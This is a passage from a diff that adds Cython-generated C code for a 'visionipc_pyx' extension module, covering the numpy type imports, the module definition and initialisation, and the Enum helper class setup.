"numpy", "flatiter", sizeof(PyArrayIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_flatiter) __PYX_ERR(2, 225, __pyx_L1_error) + __pyx_ptype_5numpy_broadcast = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "broadcast", sizeof(PyArrayMultiIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayMultiIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_broadcast) __PYX_ERR(2, 229, __pyx_L1_error) + __pyx_ptype_5numpy_ndarray = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ndarray", sizeof(PyArrayObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ndarray) __PYX_ERR(2, 238, __pyx_L1_error) + __pyx_ptype_5numpy_generic = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "generic", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_generic) __PYX_ERR(2, 812, __pyx_L1_error) + __pyx_ptype_5numpy_number = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "number", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_number) __PYX_ERR(2, 814, __pyx_L1_error) + __pyx_ptype_5numpy_integer = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "integer", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_integer) __PYX_ERR(2, 816, __pyx_L1_error) + __pyx_ptype_5numpy_signedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "signedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_signedinteger) __PYX_ERR(2, 818, __pyx_L1_error) + __pyx_ptype_5numpy_unsignedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "unsignedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_unsignedinteger) __PYX_ERR(2, 820, __pyx_L1_error) + __pyx_ptype_5numpy_inexact = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "inexact", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_inexact) __PYX_ERR(2, 822, __pyx_L1_error) + __pyx_ptype_5numpy_floating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "floating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_floating) __PYX_ERR(2, 824, __pyx_L1_error) + __pyx_ptype_5numpy_complexfloating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "complexfloating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_complexfloating) __PYX_ERR(2, 826, __pyx_L1_error) + __pyx_ptype_5numpy_flexible = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flexible", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_flexible) __PYX_ERR(2, 828, __pyx_L1_error) + __pyx_ptype_5numpy_character = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "character", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_character) __PYX_ERR(2, 830, __pyx_L1_error) + __pyx_ptype_5numpy_ufunc = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ufunc", sizeof(PyUFuncObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyUFuncObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ufunc) __PYX_ERR(2, 868, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_visionipc_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_visionipc_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "visionipc_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initvisionipc_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initvisionipc_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_visionipc_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_visionipc_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_visionipc_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + static PyThread_type_lock __pyx_t_9[8]; + PyObject *__pyx_t_10 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'visionipc_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("visionipc_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to visionipc_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_visionipc_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_cereal__visionipc__visionipc_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name_2, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "cereal.visionipc.visionipc_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "cereal.visionipc.visionipc_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + if (unlikely((__Pyx_modinit_type_import_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "EnumBase":10 + * cdef object __Pyx_OrderedDict + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * __Pyx_OrderedDict = dict + * else: + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumBase":11 + * + * if PY_VERSION_HEX >= 0x03060000: + * __Pyx_OrderedDict = dict # <<<<<<<<<<<<<< + * else: + * from collections import OrderedDict as __Pyx_OrderedDict + */ + __Pyx_INCREF((PyObject *)(&PyDict_Type)); + __Pyx_XGOTREF(__Pyx_OrderedDict); + __Pyx_DECREF_SET(__Pyx_OrderedDict, ((PyObject *)(&PyDict_Type))); + __Pyx_GIVEREF((PyObject *)(&PyDict_Type)); + + /* "EnumBase":10 + * cdef object __Pyx_OrderedDict + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * __Pyx_OrderedDict = dict + * else: + */ + goto __pyx_L2; + } + + /* "EnumBase":13 + * __Pyx_OrderedDict = dict + * else: + * from collections import OrderedDict as __Pyx_OrderedDict # <<<<<<<<<<<<<< + * + * @cython.internal + */ + /*else*/ { + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_OrderedDict); + __Pyx_GIVEREF(__pyx_n_s_OrderedDict); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_OrderedDict); + __pyx_t_4 = __Pyx_Import(__pyx_n_s_collections, __pyx_t_3, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_4, __pyx_n_s_OrderedDict); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_OrderedDict); + __Pyx_DECREF_SET(__Pyx_OrderedDict, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_L2:; + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumMeta_7__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Pyx_EnumMeta___reduce_cython, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__19)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype___Pyx_EnumMeta->tp_dict, __pyx_n_s_reduce_cython, __pyx_t_4) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype___Pyx_EnumMeta); + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumMeta_9__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_Pyx_EnumMeta___setstate_cython, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__21)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem((PyObject *)__pyx_ptype___Pyx_EnumMeta->tp_dict, __pyx_n_s_setstate_cython, __pyx_t_4) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_ptype___Pyx_EnumMeta); + + /* "EnumBase":27 + * + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF((PyObject *)(&PyInt_Type)); + __Pyx_GIVEREF((PyObject *)(&PyInt_Type)); + PyTuple_SET_ITEM(__pyx_t_4, 0, ((PyObject *)(&PyInt_Type))); + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_Py3MetaclassPrepare(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_t_3, __pyx_n_s_Pyx_EnumBase, __pyx_n_s_Pyx_EnumBase, __pyx_t_5, __pyx_n_s_EnumBase, (PyObject *) NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (__pyx_t_3 != __pyx_t_4) { + if (unlikely((PyDict_SetItemString(__pyx_t_6, "__orig_bases__", __pyx_t_4) < 0))) __PYX_ERR(1, 27, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_1__new__, __Pyx_CYFUNCTION_STATICMETHOD, __pyx_n_s_Pyx_EnumBase___new, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__23)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_4, __pyx_tuple__24); + if (__Pyx_SetNewInClass(__pyx_t_6, __pyx_n_s_new, __pyx_t_4) < 0) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_3__repr__, 0, __pyx_n_s_Pyx_EnumBase___repr, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__26)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__Pyx_SetNameInClass(__pyx_t_6, __pyx_n_s_repr, __pyx_t_4) < 0) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_EnumBase_5__str__, 0, __pyx_n_s_Pyx_EnumBase___str, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__Pyx_SetNameInClass(__pyx_t_6, __pyx_n_s_str, __pyx_t_4) < 0) __PYX_ERR(1, 41, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumBase":27 + * + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_4 = __Pyx_Py3ClassCreate(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_Pyx_EnumBase, __pyx_t_3, __pyx_t_6, __pyx_t_5, 1, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 27, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(__Pyx_EnumBase); + __Pyx_DECREF_SET(__Pyx_EnumBase, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "EnumBase":44 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03040000: # <<<<<<<<<<<<<< + * from enum import IntEnum as __Pyx_EnumBase + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03040000); + if (__pyx_t_2) { + + /* "EnumBase":45 + * + * if PY_VERSION_HEX >= 0x03040000: + * from enum import IntEnum as __Pyx_EnumBase # <<<<<<<<<<<<<< + * + * cdef object __Pyx_FlagBase + */ + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_IntEnum); + __Pyx_GIVEREF(__pyx_n_s_IntEnum); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_IntEnum); + __pyx_t_5 = __Pyx_Import(__pyx_n_s_enum, __pyx_t_3, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_5, __pyx_n_s_IntEnum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 45, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_EnumBase); + __Pyx_DECREF_SET(__Pyx_EnumBase, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":44 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03040000: # <<<<<<<<<<<<<< + * from enum import IntEnum as __Pyx_EnumBase + * + */ + } + + /* "EnumBase":48 + * + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF((PyObject *)(&PyInt_Type)); + __Pyx_GIVEREF((PyObject *)(&PyInt_Type)); + PyTuple_SET_ITEM(__pyx_t_5, 0, ((PyObject *)(&PyInt_Type))); + __pyx_t_3 = __Pyx_PEP560_update_bases(__pyx_t_5); if (unlikely(!__pyx_t_3)) 